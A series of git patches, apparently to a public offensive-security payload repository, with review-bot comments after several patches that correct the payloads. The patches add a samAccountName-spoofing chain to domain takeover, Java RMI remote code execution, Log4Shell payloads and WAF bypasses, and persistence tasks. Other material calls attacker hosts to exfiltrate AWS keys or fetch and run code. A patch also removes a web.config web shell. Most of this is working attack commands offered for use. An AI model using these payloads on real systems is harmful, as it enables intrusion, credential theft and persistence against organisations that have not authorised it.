From a09254623017d435f107700407a4bb4768fcdba1 Mon Sep 17 00:00:00 2001
From: Alvin Smith
Date: Mon, 9 Aug 2021 22:47:57 +1200
Subject: [PATCH 01/50] Delete web.config as it's not working
---
.../Configuration IIS web.config/web.config | 34 -------------------
1 file changed, 34 deletions(-)
delete mode 100644 Upload Insecure Files/Configuration IIS web.config/web.config
diff --git a/Upload Insecure Files/Configuration IIS web.config/web.config b/Upload Insecure Files/Configuration IIS web.config/web.config
deleted file mode 100644
index c14f37e..0000000
--- a/Upload Insecure Files/Configuration IIS web.config/web.config
+++ /dev/null
@@ -1,34 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-")
-Response.write("
-")
-Set wShell1 = CreateObject("WScript.Shell")
-Set cmd1 = wShell1.Exec("whoami")
-output1 = cmd1.StdOut.Readall()
-set cmd1 = nothing: Set wShell1 = nothing
-Response.write(output1)
-Response.write("
-
-–>
-
-
\ No newline at end of file
From 31a1cdc86f2cc4b1456ffba025d69504b1efee5f Mon Sep 17 00:00:00 2001
From: Alvin Smith
Date: Mon, 9 Aug 2021 22:48:10 +1200
Subject: [PATCH 02/50] Rename web.web.config to web.config
---
.../Configuration IIS web.config/{web.web.config => web.config} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename Upload Insecure Files/Configuration IIS web.config/{web.web.config => web.config} (100%)
diff --git a/Upload Insecure Files/Configuration IIS web.config/web.web.config b/Upload Insecure Files/Configuration IIS web.config/web.config
similarity index 100%
rename from Upload Insecure Files/Configuration IIS web.config/web.web.config
rename to Upload Insecure Files/Configuration IIS web.config/web.config
From 51ac02d3548bfcccf19b043530181082bb4a75d5 Mon Sep 17 00:00:00 2001
From: "Eduardo Barbosa (an4kein)" <37910997+an4kein@users.noreply.github.com>
Date: Tue, 23 Nov 2021 14:04:53 -0300
Subject: [PATCH 03/50] Update README.md
Find open buckets: https://buckets.grayhatwarfare.com/
---
AWS Amazon Bucket S3/README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md
index 97b1fd6..5abe5f9 100644
--- a/AWS Amazon Bucket S3/README.md
+++ b/AWS Amazon Bucket S3/README.md
@@ -52,6 +52,7 @@ By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_na
http://s3.amazonaws.com/[bucket_name]/
http://[bucket_name].s3.amazonaws.com/
http://flaws.cloud.s3.amazonaws.com/
+https://buckets.grayhatwarfare.com/
```
Their names are also listed if the listing is enabled.
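Review bot: The added `https://buckets.grayhatwarfare.com/` line sits inside the fenced block that enumerates S3 URL naming patterns, but it is a third-party search index of already-exposed buckets, not a bucket URL form, so a reader may try it as a naming template. Move it out of the fence into prose, e.g. `Public bucket search engines such as https://buckets.grayhatwarfare.com/ index already-exposed buckets; confirm the target is in scope before searching client names there.`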
From 03427da53485db82e5c78eca8c5008f16a25ae11 Mon Sep 17 00:00:00 2001
From: Brian Stadnicki
Date: Tue, 7 Dec 2021 06:51:27 +0000
Subject: [PATCH 04/50] SQLite Injection add extract database structure
---
SQL Injection/SQLite Injection.md | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md
index 1d3b8d9..739f49d 100644
--- a/SQL Injection/SQLite Injection.md
+++ b/SQL Injection/SQLite Injection.md
@@ -4,6 +4,7 @@
* [SQLite comments](#sqlite-comments)
* [SQLite version](#sqlite-version)
+* [String based - Extract database structure](#string-based---extract-database-structure)
* [Integer/String based - Extract table name](#integerstring-based---extract-table-name)
* [Integer/String based - Extract column name](#integerstring-based---extract-column-name)
* [Boolean - Count number of tables](#boolean---count-number-of-tables)
@@ -26,6 +27,12 @@
select sqlite_version();
```
+## String based - Extract database structure
+
+```sql
+SELECT sql FROM sqlite_schema
+```
+
## Integer/String based - Extract table name
```sql
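Review bot: `sqlite_schema` is only an alias for `sqlite_master` from SQLite 3.33.0 (2020) onward; on anything older the query fails with `no such table: sqlite_schema`, which is common on embedded and distro-packaged targets. Prefer the name that works everywhere and note the alias, e.g. `SELECT sql FROM sqlite_master -- sqlite_schema is an alias on SQLite >= 3.33.0`. The same `sql` column also exposes triggers and views, not just table definitions, which is worth a word in the section text.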
From 10974722b1601dd19bd8f3f101f11765073dcd7a Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 12 Dec 2021 23:04:35 +0100
Subject: [PATCH 05/50] BloodHound Custom Queries + MSSQL CLR
---
Methodology and Resources/Active Directory Attack.md | 6 +++++-
.../MSSQL Server - Cheatsheet.md | 11 +++++++++++
Methodology and Resources/Windows - Persistence.md | 1 +
3 files changed, 17 insertions(+), 1 deletion(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 334958f..48fc398 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -254,7 +254,7 @@ root@payload$ ./bloodhound --no-sandbox
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
```
-You can add some custom queries like [Bloodhound-Custom-Queries](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) from @hausec. Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
+You can add some custom queries like [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) and [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json). Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
### Using PowerView
@@ -3252,3 +3252,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [UnPAC the hash - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash)
* [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/)
* [Shadow Credentials: Workstation Takeover Edition - Matthew Creel](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition)
+* [Certificate templates - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/certificate-templates)
+* [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration)
+* [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls)
+* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md
index f187e21..485649a 100644
--- a/Methodology and Resources/MSSQL Server - Cheatsheet.md
+++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md
@@ -340,6 +340,17 @@ EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'
```
+
+```powershell
+# https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py
+python3 mssqlclient.py 'host/username:password@10.10.10.10' -install -clr Microsoft.SqlServer.Proxy.dll
+python3 mssqlclient.py 'host/username:password@10.10.10.10' -check -reciclador 'C:\windows\temp\reciclador.dll'
+python3 mssqlclient.py 'host/username:password@10.10.10.10' -start -reciclador 'C:\windows\temp\reciclador.dll'
+SQL> enable_ole
+SQL> upload reciclador.dll C:\windows\temp\reciclador.dll
+```
+
+
## Agent Jobs
### Execute commands through SQL Agent Job service
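Review bot: The `-check` and `-start` lines reference `C:\windows\temp\reciclador.dll` before the `SQL> upload` line that places it there, so following the block top-to-bottom fails on the check step. If I read the tool's README correctly the order is: `-install -clr`, then `enable_ole` and `upload reciclador.dll ...` in the shell, then `-check`, then `-start`; reorder the lines accordingly. A one-line comment would also help: `# blackarrowsec's patched mssqlclient.py (not impacket's); requires sysadmin, enables CLR + OLE automation on the server`.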
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index db779d2..b17d638 100644
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -273,6 +273,7 @@ Register-ScheduledTask "Backdoor" -InputObject $D
# Native schtasks
schtasks /create /sc minute /mo 1 /tn "eviltask" /tr C:\tools\shell.cmd /ru "SYSTEM"
schtasks /create /sc minute /mo 1 /tn "eviltask" /tr calc /ru "SYSTEM" /s dc-mantvydas /u user /p password
+schtasks /Create /RU "NT AUTHORITY\SYSTEM" /tn [TaskName] /tr "regsvr32.exe -s \"C:\Users\*\AppData\Local\Temp\[payload].dll\"" /SC ONCE /Z /ST [Time] /ET [Time]
##(X86) - On User Login
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onlogon /ru System
From 5714b9c9d773dce871c0afdae9c288a21dfe5807 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 13 Dec 2021 20:42:31 +0100
Subject: [PATCH 06/50] samAccountName spoofing + Java RMI
---
Java RMI/README.md | 63 +++++++++++++
.../Active Directory Attack.md | 89 +++++++++++++++++++
2 files changed, 152 insertions(+)
create mode 100644 Java RMI/README.md
diff --git a/Java RMI/README.md b/Java RMI/README.md
new file mode 100644
index 0000000..97b33fa
--- /dev/null
+++ b/Java RMI/README.md
@@ -0,0 +1,63 @@
+# Java RMI
+
+> The attacker can host a MLet file and instruct the JMX service to load MBeans from the remote host.
+
+## Summary
+
+* [Exploitation](#exploitation)
+ * [Requirements](#requirements)
+ * [Detection](#detection)
+ * [Remote Command Execution](#remote-command-execution)
+* [References](#references)
+
+## Exploitation
+
+### Requirements
+- Jython
+- The JMX server can connect to a http service that is controlled by the attacker
+- JMX authentication is not enabled
+
+
+### Detection
+
+```powershell
+$ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
+1089/tcp open java-rmi Java RMI
+| rmi-vuln-classloader:
+| VULNERABLE:
+| RMI registry default configuration remote code execution vulnerability
+| State: VULNERABLE
+| Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
+| rmi-dumpregistry:
+| jmxrmi
+| javax.management.remote.rmi.RMIServerImpl_Stub
+```
+
+### Remote Command Execution
+
+The attack involves the following steps:
+* Starting a web server that hosts the MLet and a JAR file with the malicious MBeans
+* Creating a instance of the MBean javax.management.loading.MLet on the target server, using JMX
+* Invoking the "getMBeansFromURL" method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file.
+* The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX.
+* The attacker finally invokes methods from the malicious MBean.
+
+Exploit the JMX using [sjet](https://github.com/siberas/sjet) or [mjet](https://github.com/mogwailabs/mjet)
+
+```powershell
+jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000
+jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la"
+jython sjet.py TARGET_IP TARGET_PORT super_secret shell
+jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password
+jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall
+jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx"
+
+jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000
+jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami"
+jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
+```
+
+## References
+
+* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH - 28 APR 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
+* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security - 26th March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf)
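Review bot: The requirement `JMX authentication is not enabled` is contradicted by the `mjet.py --jmxrole admin --jmxpassword adminpassword` line further down, which shows the attack also works with valid credentials; reword to `- JMX authentication is not enabled, or valid credentials are known (mjet: --jmxrole/--jmxpassword)`. The `super_secret` argument is also easy to misread as JMX credentials, whereas it is the password sjet/mjet set on the installed backdoor MBean; add `# super_secret protects the installed MBean from other users; remove it with uninstall when done` above the command block.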
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 48fc398..b7b5d36 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -14,6 +14,7 @@
- [From CVE to SYSTEM shell on DC](#from-cve-to-system-shell-on-dc)
- [ZeroLogon](#zerologon)
- [PrintNightmare](#printnightmare)
+ - [samAccountName spoofing](#samaccountname-spoofing)
- [Open Shares](#open-shares)
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
- [SCF Files](#scf-files)
@@ -672,6 +673,92 @@ Requirements:
| 0x180 | unknown error code | Share is not SMB2 |
+#### samAccountName spoofing
+
+**Requirements**
+* MachineAccountQuota > 0
+
+**Exploitation**
+
+0. Create a computer account
+ ```powershell
+ impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
+
+ powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force
+ powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose
+ ```
+1. Clear the controlled machine account `servicePrincipalName` attribute
+ ```ps1
+ impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
+
+ powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose
+ ```
+2. (CVE-2021-42278) Change the controlled machine account `sAMAccountName` to a Domain Controller's name without the trailing `$`
+ ```ps1
+ # https://github.com/SecureAuthCorp/impacket/pull/1224
+ impacket@linux> renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'
+
+ powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose
+ ```
+3. Request a TGT for the controlled machine account
+ ```ps1
+ impacket@linux> getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'
+
+ cmd@windows> Rubeus.exe asktgt /user:"DomainController" /password:"ComputerPassword" /domain:"domain.local" /dc:"DomainController.domain.local" /nowrap
+ ```
+4. Reset the controlled machine account sAMAccountName to its old value
+ ```ps1
+ impacket@linux> renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'
+
+ powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "ControlledComputer" -Attribute samaccountname -Verbose
+ ```
+5. (CVE-2021-42287) Request a service ticket with `S4U2self` by presenting the TGT obtained before
+ ```ps1
+ # https://github.com/SecureAuthCorp/impacket/pull/1202
+ impacket@linux> KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'
+
+ cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT]
+ ```
+6. DCSync: `KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'`
+
+Automated exploitation:
+
+* [noPac - @cube0x0](https://github.com/cube0x0/noPac)
+ ```powershell
+ noPac.exe scan -domain htb.local -user user -pass 'password123'
+ noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
+ noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator
+ ```
+* [sam_the_admin - @WazeHell](https://github.com/WazeHell/sam-the-admin)
+ ```ps1
+ $ python3 sam_the_admin.py "caltech/alice.cassie:Lee@tPass" -dc-ip 192.168.1.110 -shell
+ [*] Selected Target dc.caltech.white
+ [*] Total Domain Admins 11
+ [*] will try to impersonat gaylene.dreddy
+ [*] Current ms-DS-MachineAccountQuota = 10
+ [*] Adding Computer Account "SAMTHEADMIN-11$"
+ [*] MachineAccount "SAMTHEADMIN-11$" password = EhFMT%mzmACL
+ [*] Successfully added machine account SAMTHEADMIN-11$ with password EhFMT%mzmACL.
+ [*] SAMTHEADMIN-11$ object = CN=SAMTHEADMIN-11,CN=Computers,DC=caltech,DC=white
+ [*] SAMTHEADMIN-11$ sAMAccountName == dc
+ [*] Saving ticket in dc.ccache
+ [*] Resting the machine account to SAMTHEADMIN-11$
+ [*] Restored SAMTHEADMIN-11$ sAMAccountName to original value
+ [*] Using TGT from cache
+ [*] Impersonating gaylene.dreddy
+ [*] Requesting S4U2self
+ [*] Saving ticket in gaylene.dreddy.ccache
+ [!] Launching semi-interactive shell - Careful what you execute
+ C:\Windows\system32>whoami
+ nt authority\system
+ ```
+
+**Mitigations**:
+* KB5008602
+* [KB5008102](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e)
+* [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041)
+
+
### Open Shares
> Some shares can be accessible without authentication, explore them to find some juicy files
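Review bot: In step 1 `addspn.py` is prefixed `impacket@linux>`, but as far as I know that script ships with dirkjanm's krbrelayx, not impacket, so readers will not find it in their impacket install; change the prefix to `krbrelayx@linux>`. The requirements list is also incomplete: the chain only works against a DC without the November 2021 fixes, and control of any existing computer account is an alternative to `MachineAccountQuota > 0`; add `* DC without KB5008102/KB5008380 applied` and `* ...or write access to an existing computer account`.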
@@ -3256,3 +3343,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration)
* [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls)
* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
+* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
+* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
\ No newline at end of file
From 4ab26493170b2fd85c2d518d74324d1d73e0270a Mon Sep 17 00:00:00 2001
From: malet <6935429+gitmalet@users.noreply.github.com>
Date: Tue, 14 Dec 2021 19:54:41 +0100
Subject: [PATCH 07/50] Fixing "RCE - Attach Database" Payload
The old payload doesn't work for many cases as the `php` in `');--
+INSERT INTO lol.pwn (dataz) VALUES ('');--
```
## Remote Command Execution using SQLite command - Load_extension
From 0d6d6049ce03272d6e934247ab57263bc04ea625 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 16 Dec 2021 09:52:51 +0100
Subject: [PATCH 08/50] AD + Log4shell + Windows Startup
---
CVE Exploits/Log4Shell.md | 105 ++++++++++++++++++
.../Active Directory Attack.md | 3 +
.../Cobalt Strike - Cheatsheet.md | 3 +-
.../Windows - Persistence.md | 8 ++
4 files changed, 118 insertions(+), 1 deletion(-)
create mode 100644 CVE Exploits/Log4Shell.md
diff --git a/CVE Exploits/Log4Shell.md b/CVE Exploits/Log4Shell.md
new file mode 100644
index 0000000..6ca8e89
--- /dev/null
+++ b/CVE Exploits/Log4Shell.md
@@ -0,0 +1,105 @@
+# CVE-2021-44228 Log4Shell
+
+> Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled
+
+## Summary
+
+* [Vulnerable code](#vulnerable-code)
+* [Payloads](#payloads)
+* [Scanning](#scanning)
+* [WAF Bypass](#waf-bypass)
+* [Exploitation](#exploitation)
+ * [Environment variables exfiltration](#environment-variables-exfiltration)
+ * [Remote Command Execution](#remote-command-execution)
+* [References](#references)
+
+## Vulnerable code
+
+You can reproduce locally with: `docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app` using [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) or [leonjza/log4jpwn](
+https://github.com/leonjza/log4jpwn)
+```java
+public String index(@RequestHeader("X-Api-Version") String apiVersion) {
+ logger.info("Received a request for API version " + apiVersion);
+ return "Hello, world!";
+}
+```
+
+## Payloads
+
+```bash
+# Identify Java version and hostname
+${jndi:ldap://${java:version}.domain/a}
+${jndi:ldap://${env:JAVA_VERSION}.domain/a}
+${jndi:ldap://${sys:java.version}.domain/a}
+${jndi:ldap://${sys:java.vendor}.domain/a}
+${jndi:ldap://${hostName}.domain/a}
+${jndi:dns://${hostName}.domain}
+
+# More enumerations keywords and variables
+java:os
+docker:containerId
+web:rootDir
+bundle:config:db.password
+```
+
+## Scanning
+
+* [log4j-scan](https://github.com/fullhunt/log4j-scan)
+ ```powershell
+ usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
+ [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
+ python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test
+ python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass
+ ```
+* [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml)
+
+
+## WAF Bypass
+
+```powershell
+${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
+
+# using lower and upper
+${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
+${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
+${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
+
+# using env to create the letter
+${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
+${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
+```
+
+## Exploitation
+
+### Environment variables exfiltration
+
+```powershell
+${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/
+
+# AWS Access Key
+${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
+```
+
+
+### Remote Command Execution
+
+* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi)
+ ```ps1
+ java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21"
+ Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
+ Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
+ Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
+ Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy
+ Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
+ Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
+ Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
+ Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
+ ```
+* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit)
+
+
+## References
+
+* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day/)
+* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
+* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
\ No newline at end of file
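Review bot: Both payloads in "Environment variables exfiltration" are missing their closing `}`, so the lookup is never terminated and nothing is resolved or exfiltrated: `${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/}` and `${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}}`. The version statement at the top should also say that 2.15.0's fix was incomplete (CVE-2021-45046, already cited in the references) and that 2.17.0 is the safe floor, since `<=2.14.1` alone will make readers clear 2.15/2.16 hosts.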
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index b7b5d36..c9644aa 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -39,6 +39,7 @@
- [Alternatives - modules](#alternatives---modules)
- [Using Mimikatz DCSync](#using-mimikatz-dcsync)
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
+ - [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
- [Password spraying](#password-spraying)
- [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing)
- [Spray a pre-generated passwords list](#spray-a-pre-generated-passwords-list)
@@ -675,6 +676,8 @@ Requirements:
#### samAccountName spoofing
+> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a TGS to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid TGS for the domain controller.
+
**Requirements**
* MachineAccountQuota > 0
diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md
index de13806..c0f374e 100644
--- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md
+++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md
@@ -500,4 +500,5 @@ beacon> PortBender redirect 445 8445
* [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/)
* [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon)
* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
-* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
\ No newline at end of file
+* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
+* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index b17d638..39847c0 100644
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -18,6 +18,7 @@
* [Registry HKLM](#registry-hklm)
* [Winlogon Helper DLL](#)
* [GlobalFlag](#)
+ * [Startup Elevated](#startup-elevated)
* [Services Elevated](#services-elevated)
* [Scheduled Tasks Elevated](#scheduled-tasks-elevated)
* [Binary Replacement](#binary-replacement)
@@ -235,6 +236,13 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\not
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"
```
+### Startup Elevated
+
+Create a batch script in the user startup folder.
+
+```powershell
+C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
+```
### Services Elevated
